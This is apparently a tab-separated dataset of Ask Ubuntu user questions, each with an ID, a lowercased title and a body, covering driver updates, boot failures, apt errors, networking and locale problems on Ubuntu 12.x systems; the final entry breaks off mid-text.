277364	amd driver update ( one from amd.com )	hi guys what is the best way to update driver from amd.com right now i am on latest 13.3 beta 3 and just for future how do i update . on installation tut . you guys saying remove any old drivers before install new one from amd.com . is this same way updating from 13.3 beta 3 to let 's say beta 4 or even 13.3 gold release ? in other words it 's always best to delete everything and re install driver ? reason i am asking i am not too clear on how to erase everything that have to do with amd . thanks !
277386	how to enable gedit autosave files with name of current system date and time	i want gedit to autosave files , by the default name with the current system date and time . is this possible ? if not , is any hack to achieve the same ? the use of this feature is , the file names are unique by default and easy to find them for later . thanks
277389	cron job to restart apache	ubuntu server 12.04 . i use : sudo crontab -e * * * * * root /etc/init.d/apache2 restart > /dev/null 2 > & 1 sudo restart cron and it doesnt work . how to fix it ? so many docs in google , i need one `` true way '' .
277392	gpg error while doing sudo apt-get update	w : gpg error : http : //apt.newrelic.com newrelic release : the following signatures could n't be verified because the public key is not available : no_pubkey b31b29e5548c16bf w : failed to fetch gzip : /var/lib/apt/lists/partial/ppa.launchpad.net_yannubuntu_boot-repair_ubuntu_dists_precise_main_i18n_translation-en % 5fus encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/ppa.launchpad.net_yannubuntu_boot-repair_ubuntu_dists_precise_main_i18n_translation-en encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/apt.newrelic.com_debian_dists_newrelic_non-free_i18n_translation-en % 5fus encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/apt.newrelic.com_debian_dists_newrelic_non-free_i18n_translation-en encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/extras.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en % 5fus encountered a section with no package : header w : failed to fetch gzip : /var/lib/apt/lists/partial/extras.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en encountered a section with no package : header e : some index files failed to download . they have been ignored , or old ones used instead . i did `` sudo apt-get clean '' .. still am facing the same error . please help me to fix this issue .
277394	how can i open port 22 for sparkleshare ?	how can i open port 22 for sparkleshare ? every time i run dazzle create name_of_the_project ( sparkleshare ) it gives the address but does no show the port as it should be . example : it shows : ssh : //storage @ 105.236.222.41 : after ( : ) it should says 22 , which is the port . why it is not showing the port ? and how can i open the port in my ubuntu 12.04 lts ?
277398	error when trying to run mongovue with mono on ubuntu 12.04	i have installed mono version 2.10.8.1 . also installed the mongovue windows setup in ubuntu . but when i am trying to run the installed exe file am getting the following error : unknown heap type : # guld unknown heap type : # blop unhandled exception : system.invalidprogramexception : invalid il code in mangoui.program : main ( ) : il_0005 : pop [ error ] fatal unhandled exception : system.invalidprogramexception : invalid il code in mangoui.program : main ( ) : il_0005 : pop can anyone point out a solution ?
277399	how to unlock partition in gparted ?	im new in using ubuntu and i cant seem to make any partitions for a new dual boot os and the swap file or for any other matter i would want to use the partition because the drive is locked . i have already tried running the live cd or in my case a live usb and then ran gparted but the status is still the same . could anyone please shed some light in this matter ?
277402	how to recover when /etc has been deleted on ubuntu 12.04 ?	i have accidentally deleted /etc . does anybody knows how to recover from such a situation ? at least i can use ssh while the server is in rescue mode ( dedicated server from ovh.com ) . i could already mount / and /home . now i need to recover /etc content and reinstall correctly all my stuff . i am using virtual-box for this ad i 'll try to copy /etc from the virtual box to the server . may be i will need to make a clean install from scratch ?
277403	anything similar to maya for making animation-movies under ubuntu ?	are there any programs similar to maya , for making animation-movies under ubuntu ? i.e . programs where you make keyframes , and the program fill in the inbetweens . i want to make a short video for plugging a web-site , with some drawings moving around . to be frank , i planning to make a presentation more similar to powerpoint ; but with more movement ( animation ) of the graphics and figures ( more like a cartoon ) than you can get with normal presentation-programs . i guess i may have tried flash under windows ( if i had it ) , though i would prefer something a bit more advanced ( help a bit more with the animation ) ... any suggestions for a good application to do something like this ?
277404	kubuntu equivalient of shared documents	is there equivalent directories to shared documents , shared pictures etc present in windows nt 5.1 and later in kubuntu . these folders contain data public to all users . if how can i tell the desktop environment about which directories i use .
277406	ubuntu live cd : black screen and blinking cursor	i try to install ubuntu 12.04 on my computer . i can get to the purple screen on the live cd but then , if i choose `` installing ubuntu '' , i have a black screen with a cursor blinking ( and nothing else happens ) . my pc : acer aspire m3920 , cpu i5-2300 , 8 gb ram , nvidia gt 405 . what i already tried : i tried with 12.04 and 13.04 daily build i tried with a live usb and with a live dvd i tried the following boot options : nomodset , acpi=off i googled a lot and it seems that it could be a graphic card problem . do you know any other boot options that i could try ? update this is not a duplicate : i 've tried all the common boot options ( nomodeset , noacpi ... ) and it does n't change anything . with the option `` no splash '' ( instead of `` quiet splash '' ) , i can see what happens before the forever-blinking cursor : [ sdg ] no caching mode present [ sdg ] assuming drive cache : write trough ata8.00 : excetion emask 0x52 ... frozen ata8 : serror : { recovdata recovcomm unrecovdata ... } ata8.00 : failed command : identify packet device ... ata8.00 : status : { drdy } ata8 : hard resetting link does somebody know what it means ? n.b . astonishingly , puppy linux boots fine ( but debian , fedora and ubuntu do not ) solution in fact , it was not a graphic card problem . i had to disconnect the dvd drive and connect it to another free sata connector ( i do n't really understand why ubuntu had trouble with this connector and windows 7 not ) . after that , everything worked fine .
277407	ca n't run ubuntu from usb	there is no option to run from usb , the menu shows grub 2.0 and the only options available are try without installing and install ubuntu.the boot menu is uefi and i 'm using the 12.10 x64 version .
277414	failed to install gnome3 ubuntu 12.04	sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install gnome-shell gnome-session sudo apt-get -f install sudo apt-get install gnome-shell sudo apt-get install gnome-session but when i try to run sudo apt-get install gnome-shell gnome-session i have some error this error : the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell : depends : gnome-icon-theme-full but it is not going to be installed recommends : gnome-session-fallback but it is not going to be installed e : unable to correct problems , you have held broken packages .
277415	how can i make some command to run at certain times after login ?	i want to run some executable files , not when system startup , but after a few second after login ? it is a *.sh files .
277418	program to monitor gpu temp/usage for amd cards ?	is there a program that can display the active clock speeds , gpu usage and temperature of amd graphics cards ? thanks .
277421	streaming music to marantz m-cr603	our stereo installation supports , according to the box , streaming over airplay ( although the normal raop stuff does n't seem to work on it . i think it 's something called airport express ) , dlna and windows media sharing . on ubuntu , it seems almost impossible to get this thing to work , while on windows it 's possible with itunes and airfoil . what i 've tried , and what went wrong airplay : streaming over pulseaudio music players refuse to play . status changes to playing , but the search bar thingy and the position counter do n't progress . no sound comes out of either the stereo installation or the computer . i 've also tried to manually create a `` sink '' ( ? ) using pactl load-module module-raop-sink server=192.168.1.32 . the result was the same . airplay : stream2ip i 'm guessing this uses the same backend as the pulseaudio thing , or perhaps even does exactly the same . it says it 's connected , but exactly the same happens as did with the previous method . the stereo installation does n't even recognise any kind of connection . it just continues playing what it 's already playing . dlna : stream2ip when i go to media server on the stereo installation , it sees robinj : root . music , browse files , ... all go on to a screen saying < empty > . dlna : serviio this actually seems to work fine . the free version is limited , and it 's not open source , but at least it allows me basic streaming features . however , what i 'd prefer is for audio from a specific applicattion , or if possible the whole system , to get streamed to the stereo installation . rather than me having to browse through menu 's on the stereo to choose a song . windows media sharing : nothing i have no idea how to do this on ubuntu . does anyone have any suggestions ? do n't just close this as an `` exact duplicate '' , because if i have n't found an answer after looking for half a year , i think it 's safe to assume that the answer is not yet on this website . i 'm running ubuntu 13.04 , but i do n't mind switching to 12.04 or 12.10 , or even en different distro , if it 'll work there .
277422	can i run ubuntu 12.10 in my pc ?	my system is : motherboard : zxi945lm4 processor : intel pentium 4 . 2.4 ghz ram : 3 gb
277428	ca n't change resolution in xubuntu	i have a freshly installed xubuntu 12.04 on an old computer . i 'm fairly new to working with ubuntu ( i know how to use google ) and can not seem to get the right resolution with it connected to a 16:9 lcd tv ( the resolution i want is 1280x720 , or anything that comes close ) when trying to create a new resolution with xrandr it says `` failed to get size of gamma for input '' trying to configure xorg.conf it says that the file does n't exist , and when trying to create a new one it says : fatal sever error : server is already active for display 0 , etc . ( for info ) with lspci i got ; $ lspci | grep vga 01:00.0 vga compatible controller : via technologies , inc. cn700/p4m800 pro/p4m800 ce/vn800 graphics [ s3 unichrome pro ] ( rev 01 ) so any tips for the right way to configure xorg , xrandr , getting the right drivers , or should i give up since it 's connected with a vga cable ? ( or maybe a program to `` fake '' a resolution ? )
277429	how to keep version number in a single place in a python project with setup.py and debian/control	for a python project i 'm working on , i 'd like to : keep a version string in a single place . be able get the version string at runtime for logging purposes get a default value when launching the code from the source branch . get a value that depends on the bzr revision number of the branch that was used to build the source package . make the project packages available in a launchpad ppa using a recipe . in the way the code works right now : the version number is in debian/changelog a recipe in launchpad adds the revision number of the development branch when the source package is built . a function in setup.py parses the first line of debian/changelog to retrieve the version number and pass it to setup so that setup -- version works fine ( without the revision number , but that could be fixed ) . however , the version number is n't available at run time . what would be a good way to do that and meet the requirements above ? some solutions i 've used/seen in the past are based on generating a version.py module at build time from a template : using a external tool a tool/command is used to generate a version.py module with the version number . however , this does n't work well with launchpad recipes because the ability to run arbitrary commands in a recipe is disabled in launchpad . in setup.py i 've seen a project that subclasses distutils.command.install_data.install_data to perform some string substitutions on the fly . however the code is n't very readable , so i 'd prefer to use some other strategy . besides this , i 've also used python-apt to just query the apt cache for the installed package version to get the version string back . however , this does n't work to display a default value when the code is launched from the source branch unless the package is n't installed or some path checks code are added which is n't very clean from my point of view . i 've already read other questions in so like : how can i get the version defined in setup.py ( setuptools ) in my package ? automatic version number both in setup.py ( setuptools ) and source code ? but they do n't really address the problem of dealing with with packaging and version control at the same time . please let me know what could be a reasonable approach to do this and provide a link to an example project that uses that approach if possible .
277430	how to escape special characters in password ?	i am trying to install svn in ubuntu . my network proxy has a password . in apt.conf when i do : acquire : :http : :proxy `` http : //username : pass @ word @ proxy_server : proxy_port '' ; it 's not working . my question is how can i escape @ in pass @ word ? i tried many combinations but it does n't work .
277435	is there a network switch 's brand which is more linux friendly than others ?	so basically i 'm looking to set up a lan of 3 to 8 pc ( all running with ubuntu ) . the goal is to transfer lots of data between them . i intended to buy a network switch and connect all the machines to it . after some serious issues with a network adapter which was not linux friendly ( now i know that intel is more suitable ) , i 'm checking before purchasing this other piece of equipment . ps : i think that any switch will do since it is not os dependent ... but as a newbie , i 'm still asking . ps2 : it appears that setting up a static network is quite easy , but if you got a good tuto i 'll take a look at it . thanks .
277437	ubuntu 12.10 boots into grub command prompt in dual boot	i 'm running a dell inspiron 3520 . i decided to install ubuntu on this alongside windows 8 , because i need it . i downloaded the amd64 iso since my laptop is 64 bit . i put it on my usb using unetbootin . i turned off secure boot . after it boots , i get a grub command prompt . why does n't it show the boot menu ? i 'm sure it installed correctly . i tried installing it twice , but i still get the same results . what 's the problem ? by the way , i get the boot menu when i 'm trying to install it using the live usb . i looked at other questions but they got it when they upgraded .
277442	can i check whether my usb ports are working correctly ?	yesterday i noticed the film i was playing from my external hard drive kept stopping and starting , and vlc would throw up some i/o errors . i do think it 's actually the drive , as it 's been dropped a few times and when downloading through utorrent when i had windows i would get a death error . ca n't remember what it was , but googling told me it meant the sector was bad . but anyway , i want to check the usb ports too because sometimes if a usb device stops working , switching to another one will solve the problem , which is worrying because it is a new motherboard . any help is appreciated !
277446	allowing vnc only for specific mac address ?	i just want to allow only for a specific mac address ( es ) to have vnc to my ubuntu 12.10 . this would be pretty cool , because i think if i use password authentication + mac filter = safe . i saw i could filter for the ip´s , but how to do this for mac´s ? any ideas or suggestions ? thank you
277447	ubuntu-tweak stopped working	** ( ubuntu-tweak:5760 ) : warning ** : failed to load shared library 'libwebkitgtk-3.0.so.0 ' referenced by the typelib : libwebkitgtk-3.0.soso : can not open shared object file : no such file or directory /usr/lib/python2.7/dist-packages/gi/_gobject/__init__.py:279 : warning : can not derive `ubuntutweak+apps+appswebview ' from non-derivable parent type `void' type_register ( cls , namespace.get ( '__gtype_name__ ' ) ) traceback ( most recent call last ) : file `` /usr/bin/ubuntu-tweak '' , line 124 , in from ubuntutweak.main import ubuntutweakwindow file `` /usr/lib/python2.7/dist-packages/ubuntutweak/main.py '' , line 32 , in from ubuntutweak.apps import appspage file `` /usr/lib/python2.7/dist-packages/ubuntutweak/apps/__init__.py '' , line 99 , in class appswebview ( webkit.webview ) : file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 220 , in __init__ super ( gobjectmeta , cls ) .__init__ ( name , bases , dict_ ) file `` /usr/lib/python2.7/dist-packages/gi/_gobject/__init__.py '' , line 227 , in __init__ cls._type_register ( cls.__dict__ ) file `` /usr/lib/python2.7/dist-packages/gi/_gobject/__init__.py '' , line 279 , in _type_register type_register ( cls , namespace.get ( '__gtype_name__ ' ) ) runtimeerror : could not create new gtype : ubuntutweak+apps+appswebview ( subclass of void )
277451	software center stop working ?	2013-04-03 19:25:58,551 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-04-03 19:25:58,561 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-04-03 19:25:59,468 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-04-03 19:25:59,476 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-04-03 19:25:59,476 - root - error - could not find any typelib for launchpadintegration 2013-04-03 19:25:59,585 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-04-03 19:25:59,590 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) ** ( software-center:5904 ) : warning ** : failed to load shared library 'libwebkitgtk-3.0.so.0 ' referenced by the typelib : libwebkitgtk-3.0.soso : can not open shared object file : no such file or directory /usr/share/software-center/softwarecenter/ui/gtk3/widgets/videoplayer.py:42 : warning : can not retrieve class for invalid ( unclassed ) type `void' self.webkit = webkit.webview ( ) traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 182 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1387 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1325 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 151 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 139 , in init_view softwarepane.init_view ( self ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/softwarepane.py '' , line 161 , in init_view self.cache ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/appdetailsview.py '' , line 884 , in __init__ self._layout_page ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/appdetailsview.py '' , line 1219 , in _layout_page self.videoplayer = videoplayer ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/widgets/videoplayer.py '' , line 42 , in __init__ self.webkit = webkit.webview ( ) typeerror : could not get a reference to type class
277457	high system load and slow file manager after installing ubuntu one	i have previous experience with my acer 5820tg and ubuntu 12.04 32bit but now i have reinstalled it to 64bit version and strange things began to happen : ) the only difference in the way i use the system that has changed is that i am using ubuntu one to backup all my projects in a directory . nautilus worked ok for the first couple of days but now is slow and it sometimes takes forever to open the folder . i have tried couple of things like turning off thumbnails of files but it did not help . in addition i have noticed that my fans are a bit louder than before , it is not noisy or anything but it still annoys me . so i was looking for some solutions , i have installed jupiter , switched to power on saving mode but nothing has changed . it says my cpu temperature is slightly above 50째c which is ok. after that i have found some script which regulates the fans speed , it helped after the restart , laptop was silent and jupiter announced the temperature around 40째c . my happiness did n't last long and after a day i am again on the same temperature as before , nautilus is still slow and laptop fans are annoying . i have a feeling i am trying to cure the symptoms and not the illness . thanks for any advice . edit : after the help from mhc in the comments below i have tried the power management tool tlp and powertop but the issue persisted . so i was advised to monitor the cpu usage per process with top for a few minutes . and i think i have found my answers here . it turned out that i am facing this bug . so when ubuntu one was syncing the folder the was slowing down the whole computer additionaly causing nautilus problems . i have stopped the application and now my cpu temperature is even around 38째c . i hope this was the solution and big thanks to mhc : )
277460	displaylink usb video adapter on ubuntu 12.10	is there any way to run usb displaylink on ubuntu 12.10 ?
277464	focusrite saffire pro - signal but no sound	i am utilizing ubuntu 12.04 with the kxde desktop environment . jack ( qjackctl ) , ffado-mixer , and the the focusrite saffire pro 40 itself appears to be receiving signal ( to include led meter input ) . however , i have no audible sound output from front headphone connections or individual outs ( i.e . direct input or media play ) . i have uninstalled pulse audio to ensure that there is no conflict . seems like this should be a minor oversight on my part . could someone please assist me in resolving this issue ? thanks in advance .
277465	set no password but still asks for one	i recently got rid of my password for my account on my ubuntu ce 12.04 and when i try to go in to the software center or terminal or just back in my account , it asks for a password . i do n't know what to do . i have tried googling the answer but i am still new to ubuntu . i recently had microsoft . please explain with detail
277470	black screen instead of passphrase screen ( sda5_crypt )	i did a fresh install of ubuntu removing windows and every data from the drive . i chose the option to encrypt my disk pre-boot . when i boot ubuntu out of grub , i get a black screen for a second or two but then the screen where i have to enter my passphrase shows up and everything works fine . however , my laptop is n't supposed to always boot into grub ( ubuntu being the only os ) . when i boot the machine without grub , all i get is a black screen that does n't initialize even after waiting for a couple of minutes . it is possible to press ctrl+alt+t on that black screen , and it yields some kind of boot console saying enter passphrase : **error : unexpectedly disconnected from boot status daemon cryptsetup : cryptsetup failed , bad password or options ? unlocking the disk /dev/disk/by-uuid ... ( sda5_crypt ) enter passphrase : so i can now put in my passphrase into that white on black console screen and ubuntu will boot normally ( without the ubuntu splash screen though ) . i furthermore noticed that i am able to enter the password `` blindly '' ( i.e . without bringing up the console first ) , hit enter and ubuntu will boot as well . i did already try the boot-repair utility and reinstalling ubuntu . i would very much like to see the usual `` enter passphrase '' screen instead of having to bring the boot console up first , but i 'd also be glad when i could manage the machine to automatically boot into grub , wait 0-1 seconds , automatically choose ubuntu and then get to that passphrase entry screen . setting the grub_hidden_timeout like suggested in this thread did n't work for me , though . it still yields the same result as if i was booting the machine without grub .
277473	disable all usb storage devices except usb dongle	i need to disable all usb storage devices except a software protection dongle . how do i do it ? i tried black listing the usb storage device , but that seems to block all usb devices including the dongle . can udev be used for this ? if yes , i ca n't figure out the command , i tried using a grep to determine disk size and then block all disks having size above 2mb . but in that case , how do i make it apply for usb storage devices in specific .
277475	system backup image in dvd	i 'm using ubuntu 12.10 installed alongside with windows 7 . can i just have a system backup in the form of one or more dvd ( s ) so that i can restore the system with every package that are previously installed and if possible can i make use of that dvd ( s ) as a live cd with all the previously installed packages ? if `` back in time ( root ) '' is installed in my system , will it be useful ?
277477	mount symantec pgp encrypted hdd in ubuntu	my laptop uses windows 7 with pgp whole disk encryption product from symantec . today , the laptop crashed & is now showing some windows recovery related errors . ( i am unable to boot to windows . ) now , i need to access the data on that hdd , by connecting it as secondary hdd to my ubuntu system . had it been a simple ( unencrypted ) hdd , i could have easily connected it & mounted it to copy the data . however , it is not possible for encrypted hdd . is there a way to mount the pgp encrypted hdd on ubuntu ? the partitions i am interested in are ntfs partitions , encrypted with symantec 's pgp whole disk encryption .
277481	compositing managers	how can i determine which compositor is currently being used when multiple desktops have been installed such as lxde and xfce . compiz is also installed . is there a code that will show which installed compositing manager being used ?
277483	how to contact canonical to sponsor an event	the question should really start with `` is this possible to do '' , but assuming one can ask canonical for permission to sponsor an event , i was wondering if they could help with gear . for example several t-shirts with an ubuntu logo . in my case it is the flisol event ( latin american free software install fest ) which occurs in several latin american countries on the same day ( april 27th.. 2 days after 13.04 is released ) and it 's objective is to teach new users the advantages of open source , how to install it and use it . since i am the coordinator this time around i wanted to know , who/where/how to contact if this is possible so we can get support related to ubuntu . right now the team is composed of 6 people including me and the idea is to offer the shirts as a prize for users that answer some ubuntu related questions and also to appear with the shirts when doing the google hangouts as part of the talks we will be doing during the event .
277485	how do i install roundcube ?	does anybody know how to install roundcube on ubuntu precise .
277486	renaming files with conversion from hex	i want to rename the below files , such that the first 4 chars and last 7 chars are removed , the remaining chars to be converted to decimal , while rename . example if the filename is 0030002345678.txt , should be renamed to 00.txt ( removing the chars and converting to hex ) . if it is 00300a2345678.txt , should be renamed to 10.txt ( after conversion from hex of '0a'
277492	is there any way to prevent two or more windows of the same program from merging into one in the launcher on the left edge of the screen ?	lets say if i have 2 or 3 firefox windows open . i dont want them to merge into a single icon as it does and shows 3 arrows on the left side of the icon . instead i want it to show 3 different icons . the reason i want this is to make navigation between windows easier .
277493	why are there 2 routes in this table instead of one ?	route -n gives : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.20.254 0.0.0.0 ug 0 0 0 eth0 192.168.20.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 ifconfig gives : eth0 link encap : ethernet hwaddr 00:0c:29 : f1:76:32 inet addr:192.168.20.10 bcast:192.168.20.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fef1:7632/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6387084 errors:0 dropped:24 overruns:0 frame:0 tx packets:374481 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:712509342 ( 712.5 mb ) tx bytes:37312703 ( 37.3 mb ) interrupt:18 base address:0x2024 why do i need 2 routes here instead of 1 ? what is the point of this line ? 192.168.20.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 my interface address is 192.168.20.x with a netmask of 255.255.255.0 , so surely the stack can tell how to get to 192.168.20.y , why do i have that second entry in the routing table ?
277497	check shutdown privilege	i 'm trying to make a c++ program on ubuntu that checks if a user can shutdown the pc , and , if so , shut it down for him . so , i 'm thinking about getting the user id , and then , checking if , or if not , he has the rights to shut down the computer . however , i really do n't know what is the critera in ubuntu that says if a user has such a right ... do you happen to know what this is ? thanks !
277502	how to change the path of folders in home directory to an external hdd ?	i am using ubuntu 12.04 . i 'm trying to change the path from the special folders ( i mean the ones in my home directory ) to folders on my external hdd . i already auto-mounted the hdd by adding a uuid-command to the start-up applications /usr/bin/udisks -- mount /dev/disk/by-uuid/7a92f7dd-bd54-4a1c-88eb-be7eea04e79a that 's the one . now i tried to edit ~/.config/user-dirs.dirs , but every time i reboot it goes back to the home folder am i missing something somewhere ?
277505	empty disk partition after opening windows 8	i have both windows 8 and ubuntu 12.10 on my machine . i always use ubuntu and nearly never logged in to windows 8 . however i needed to use windows today and encountered a serious problem . when i logged in to windows 8 , one of my disk partiotions became empty . i can not see any of my files neither on windows nor ubuntu . used disk size shows the correct size , but there is no content in the disk . disk partition type is ntfs and i created it when installing ubuntu . can i bring my files and folders back ?
277509	microphone and speakers stop working	i was trying to make a skype call and then the microphone just went mute . i tried to solve the problem by restarting pulseaudio ( with service as well as killing it with -9 ) and then the speakers stop working as well ! what can be wrong ?
277514	connection failed message when installing wine	when installing wine in 12.10 i get the following message : err http : //np.archive.ubuntu.com/ubuntu/ precise/main fonts-unfonts-core all 1.0.3.is.1.0.2-080608-5ubuntu1 connection failed failed to fetch http : //np.archive.ubuntu.com/ubuntu/pool/main/f/fonts-unfonts-core/fonts-unfonts-core_1.0.3.is.1.0.2-080608-5ubuntu1_all.deb connection failed e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
277517	what does `` ctrl + alt + f12 '' do ?	i accidentally pressed ctrl+alt+f12 and my display turned to black ... i then had to make a reboot.. what did it do to my system ? also what does alt+ f8 to f10 do ?
277518	ssh terminal automatic resizing	ubuntu installations ( 12.04 and 14.04 ) from the mini.iso ( and not on server or desktop versions ) result in the host providing terminal session that do not automatically resize themselves to the same size of the client when one sshs into them . this can be seen below : this is noticeable on rackspace cloud ubuntu servers as well as kvm instances that i have deployed myself . one can workaround the issue by installing xterm and running the command resize manually every time you resize your terminal . does anybody know what packages i need to install/configure to have the host act like the server and desktop installations whereby there is automatic adjustment ? update i discovered that for my local kvm setup , i only got this effect when connecting with sudo virsh console $ vm_id and not when i ssh into the virtual machine . however this problem still persists with rackspace vms . i just tried again today ( 25th may 2014 ) and easily noticeable when you open vim .
277519	xrdp and hyper-v running on windows 8 enterprise	i 'm running ubuntu 12.04.2 as a hyper-v client and it runs perfectly . but because hyper-v only allows a small window ( 800x600 ) which can not be changed ( as far as i know ) i 've been trying to use xrdp to launch it into a full screen . it does work or at least to a point , as soon as i launch the home folder in ubuntu xrdp terminates . my ubuntu client as latest updates and i have used xrdp with success to access a stand alone ubuntu machine . any thoughts about the issue or alternate solution that works well with windows 8 enterprise ?
277523	ubuntu 12.04.2 nvidia optimus issue	i have installed ubuntu 12.04.2 on my system ( dell xps l702x ) . my system has nvidia optimus and i am not able to install optimus in order to avoid loud fan and other things like very short battery life . i ran lspci -vmk | grep -a 8 -b 2 vga in order to see what drivers are used for the hardware , the result of the command is the following : device : 00:02.0 class : vga compatible controller vendor : intel corporation device : 2nd generation core processor family integrated graphics controller svendor : dell sdevice : device 0571 rev : 09 driver : i915 module : i915 -- device : 01:00.0 class : vga compatible controller vendor : nvidia corporation device : device 124d svendor : dell sdevice : device 0571 rev : a1 driver : nvidia module : nvidia_current_updates module : nouveau i have followed the instruction at ubuntu help wiki to install optimus but when i run sudo apt-get install bumblebee bumblebee-nvidia linux-headers-generic-lts-quantal , i get the following error message : the following packages have unmet dependencies : bumblebee-nvidia : depends : nvidia-current but it is not going to be installed e : unable to correct problems , you have held broken packages . after following the instruction at how well do laptops with nvidia optimus work ? the issue seemed to be solved , but now i am continuously getting internal error , by the error report system i was able to get the following information : executablepath - /usr/share/apport/apport-gpu-error-intel.py package - xserver-xorg-video-intel ( not installed ) problemtype - crash etc ... do i have to install xserver-xorg-vido-intel ? can you please help me ? thank you ! follows the new output of lspci -vmk | grep -a 8 -b 2 vga device : 00:02.0 class : vga compatible controller vendor : intel corporation device : 2nd generation core processor family integrated graphics controller svendor : dell sdevice : device 0571 rev : 09 driver : i915 module : i915 -- device : 01:00.0 class : vga compatible controller vendor : nvidia corporation device : device 124d rev : ff progif : ff device : 02:00.0 class : multimedia controller vendor : philips semiconductors
277525	why does any upgrade pause in chengelog0	whenever i do an upgrade the system pauses and waits for me to press f2 before it continues , displaying often a changelog , is there anyway to stop this from happening ? ubuntu 12.10 64bit for example as shown below , the upgrade has paused : get:1 changelog for libxslt1.1 ( http : //changelogs.ubuntu.com/changelogs/pool/main/libx/libxslt/libxslt_1.1.26-14ubuntu0.1/changelog ) [ 37.2 kb ] libxslt ( 1.1.26-14ubuntu0.1 ) quantal-security ; urgency=low * security update : denial of service via malformed stylesheet - debian/patches/cve-2012-6139.patch : check for empty values in libxslt/functions.c , libxslt/keys.c , add tests in tests/* . - cve-2012-6139 -- marc deslauriers < marc.deslauriers @ ubuntu.com > thu , 28 mar 2013 13:03:10 -0400 get:1 changelog for libpoppler28 ( http : //changelogs.ubuntu.com/changelogs/pool/main/p/poppler/poppler_0.20.4-0ubuntu1.2/changelog ) [ 42.7 kb ] poppler ( 0.20.4-0ubuntu1.2 ) quantal-security ; urgency=low * security update : invalid memory access issues - debian/patches/cve-2013-1788.patch : add checks in poppler/function.cc , poppler/stream.cc , splash/splash.cc . - cve-2013-1788 * security update : denial of service via malformed documents - debian/patches/cve-2013-1789.patch : validate data in splash/splash.cc . - cve-2013-1789 * security update : uninitialized memory read - debian/patches/cve-2013-1790.patch : properly handle refline in poppler/stream.cc . - cve-2013-1790 -- marc deslauriers < marc.deslauriers @ ubuntu.com > fri , 08 mar 2013 13:43:15 -0500 get:1 changelog for xdiagnose ( http : //changelogs.ubuntu.com/changelogs/pool/main/x/xdiagnose/xdiagnose_3.2.3/changelog ) [ 18.5 kb ] xdiagnose ( 3.2.3 ) quantal-proposed ; urgency=low * xdiagnose.udev : disable gpu apport hook from being triggered by udev . this should only be enabled during the development period . apport is disabled after release , but it appears the hook still gets triggered under certain circumstances . ( lp : # 1073626 ) -- bryce harrington < bryce @ ubuntu.com > thu , 14 feb 2013 12:38:26 -0800 ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ( end ) update : actually it now pauses here and stops.. i can not go any further . if i close terminal i get a message : there is still a process running in this terminal . closing the terminal will kill it . any ideas what is going on here ?
277526	changing ubuntu locale settings by gui crashes the accounts-daemon	i 'm usung ubuntu 12.04 and after an automatic update it changed the system default encoding form utf-8 to `` ansi_x3.4-1968 '' . i realized that when my code comments in eclipse appeared with strange characters , and after realizing that the ide was innocent , i 've opened a terminal to check . when i type latin characters in a terminal window , such as çãõéèê ... , a question mark shows instead . same is when i cat a text file . changing ubuntu locale settings by gui crashes the accounts-daemon : executablepath : /usr/bin/gnome-language-selector proccmdline : /usr/bin/python /usr/bin/gnome-language-selector ... file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbusexception : org.freedesktop.accounts.error.failed : running '/usr/share/language-tools/save-to-pam-env ' failed : no output i 've then changed the save-to-pam-env adding a debug line and executed the lang-selector in a terminal : gag @ desktop~ > /usr/bin/python /usr/bin/gnome-language-selector ( gnome-language-selector:17733 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_collate to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` pt_br '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . ... same message a dozen times ... locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_collate to default locale : no such file or directory /usr/lib/python2.7/dist-packages/languageselector/gtk/gtklanguageselector.py:858 : unicodewarning : unicode equal comparison failed to convert both arguments to unicode - interpreting them as being unequal self._localeinfo.translate ( loc , native=true ) == defaultlangname ) : //the line below is my debug 'print' exec : /usr/share/language-tools/save-to-pam-env /home/likewise-open/certi/gag 